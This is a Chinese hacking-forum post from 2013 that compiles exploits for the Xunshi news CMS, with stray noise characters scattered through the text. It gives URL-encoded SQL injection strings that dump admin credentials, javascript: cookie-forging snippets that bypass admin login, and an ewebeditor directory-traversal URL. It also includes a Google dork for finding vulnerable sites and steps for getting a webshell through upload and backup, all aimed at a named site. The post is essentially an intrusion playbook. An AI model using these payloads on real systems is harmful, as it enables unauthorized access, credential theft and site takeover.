找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 讯时漏洞总结
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2668|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
by:血封忆尘' q' n' f6 `8 y( k
! `# d/ U; s/ _, h: Q" t" O
在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)
) h0 a" H/ ~) ?) `8 }9 y% F+ s: H+ A% z. S/ m  Z" ]  y
以下本文总结来自黑防去年第9期杂志上的内容...- @. `1 j. [4 `) Z

# l6 o% f4 ]$ O7 ?- V% u) `4 A先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%
: o& p- Z3 D! k% j( H! ?# ^1 N% y3 k7 s8 q& t
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2 ; j. ?6 M* I6 ?

( G. c# C) r! ~/ w- x记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况
1 ]/ |, k, q- O, t7 ]+ B7 i这里一个注入
/ j) n: z8 r, M3 J  d
# ~, o6 }* ]( E# a3 G6 `# J效果如图:7 P, L  M5 Z$ g6 P9 _) i5 E

0 C# {/ L4 K) @) H9 b% v7 w 4 L/ x3 f0 z8 r7 i# t; P5 n8 c
/ `. @/ V, o9 t2 o
这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.' I- V! C! u- n, w: J: G9 P
1 J! G2 X! P. A6 Z
密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去' S* s! Y! {# h4 c$ _

/ p7 S0 f) _! p8 m! r  ljavascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));* _$ O; z& I3 s; h: b$ }1 i

0 B! I8 u) u7 P! U; |0 _/ V那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:$ T( E) Z4 j- D; A

$ H8 g/ G' o. E( N* |因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞
4 H. }5 U- g- B* W% S3 z# Y$ h  {( m$ S0 N
它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以7 u9 ~* ^  f1 l

3 L4 o: `( e: y3 m. w访问这页面来列目录..步骤如下:
2 i8 W" l7 V! O. M
2 l" Y8 u1 ^' g3 l/ O  x  Ijavascript:alert(document.cookie="admindj=1") $ A4 g+ s+ g+ W* F3 V: B  }4 E
: ~3 X( I" t; I9 f
http://www.political-security.co ... asp?id=46&dir=../..) T2 |. L# Q1 x* J$ @1 W9 t5 O
8 @* G4 g$ Y$ T  U
效果如图:
% Y; K. B" C/ ?2 ~, v' R0 [9 x# Z- D: H8 Z- A1 z& l, O

- t# b& w& G8 r4 m; U4 _- U' M" K
这样全站目录都能瞧了..找到后台目录..进去..
( z  V* l+ w) d" [/ m  y: x; _; e  D8 {# G" Q
那么进了后台怎么拿shell??上传--备份就ok了..: n) z4 v4 g4 Y3 a6 E3 i- b6 h: J

+ [8 e; p" y2 ?! _0 s, e那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..2 m: O2 Z; T7 N9 E9 P
% Y# o3 C0 s  V- P- X! z
这个我也碰到过一次..你都可以通过列目录来实现..# H; y1 y7 V9 o8 _; R8 \# N% Q
5 v! e2 D$ d" e1 ?$ a% ^2 D9 P
javascript:alert(document.cookie="admindj=1") ; a% \. w/ J+ v
( }$ K' P8 Z$ a# [/ d
http://www.political-security.co ... p?action=BackupData
9 ^3 ^, E2 c  ^6 O! d' m
# J- X2 `! q' E9 ~7 i备份ok..% s+ [) n  T, d: U. F# U

! \) C% X' x% }- s! Q: Z! P那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?; P% I1 \$ N' \( Q
" Z$ _6 t3 _/ U4 N# g. S; C1 Y/ |. a" o
在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下# e: ~+ t% q- S* q% q

& [! i; N: n* l/ N' l0 D3 G然后访问此页面进行注入..步骤如下:" E/ A! B1 z( c! D* r
- c4 N% s! H* K7 f( ^  E
javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")* G6 K( \9 k; |& C0 c  j. C
7 S: f* I( A/ H& |% ]5 r
然后请求admin/admin_chk.asp页面
) `2 |2 `) n: l- ?" [& x7 C5 U. J/ D( k, D. ]4 d5 y3 g; l
输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
8 J$ g1 E8 Q5 E* I6 d1 s* ?* `7 B1 [% Q+ v0 B% R
26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin& m8 A# g5 m5 o$ G& [$ A2 M9 I" x

5 h6 O% W: {% O+ ], H- r" F1 Q; a效果如图所示:
* E4 }# |9 Q9 ^- ~) ?4 t; ~
% Y0 Y( @% P1 ]  n4 F, u& P
) l3 R& v, p4 n0 ~& W" r( u7 W. i' d' L8 d# _" b) E
讯时漏洞2
/ |: C; Z' _8 k& mgoogle关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)
! e& O7 @6 {# p. G, o 0 D( s; ^" s9 G- f& q) [
1、/admin/admin_news_pl_view.asp?id=1% F* l, u% y/ _7 e. q$ ~
//id任意 填入以下语句- V# \$ A- N. c) o" x

( W+ o2 X( C& U8 p, K8 b/ U2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!
7 N+ Z6 U  b1 O" a4 |( b' v
) W$ G7 F; G; p" Q# o0 P
" K/ _( `. f! H. C) G7 p: N, w7 g, b4 H- C& J: I
3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username=', F& P: ?+ q; V5 ?" w. D2 z

+ r0 l# I) p2 z; \3 e7 P
5 F! L1 G* `& Q) U  s
* t; q; h' }$ V: E& L- R1 o爆出管理员帐号和密码了
7 s8 G+ S, T, j' _ 2 q" E( r2 _7 X( q8 W

& g: C8 a# {" \  X& D; ?
) o, u- n3 \( ~. g- e2 H7 g4、cookies进后台# U  g6 t! T4 X5 {
! J; A* j# Q0 s: E* p9 l) }9 b
javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));5 z6 P- S' B; f! r) d6 y

; E* z9 a3 b) ^/ x5 d9 q6 e9 K9 C* S: s4 @/ O5 m' T, \

: Q: y: O! I& H5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!6 L5 ^3 ~8 x% g4 A3 \# ~' O
* k/ I& j/ ?8 J/ `+ j6 q

: F  Z& t1 s4 @5 p9 c$ O. H. V  g! f
; i- f0 n0 l+ H4 [" S5 L/ `6、后台有上传和备份取SHELL不难。
2 m' y" b- W0 L' ~2 F( p * h. t" s$ v7 n8 b" }
7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..& O- \7 @- r$ i& Q; ^: R5 S; d
8 G' [4 A+ [7 i; L) }  i. ~
逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!4 T6 k: D. N) t* Z! U

$ [7 F$ G+ ?# M5 A! T( c1 t& i/ f" K% f  ?

' h" y2 @1 _3 [# z
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表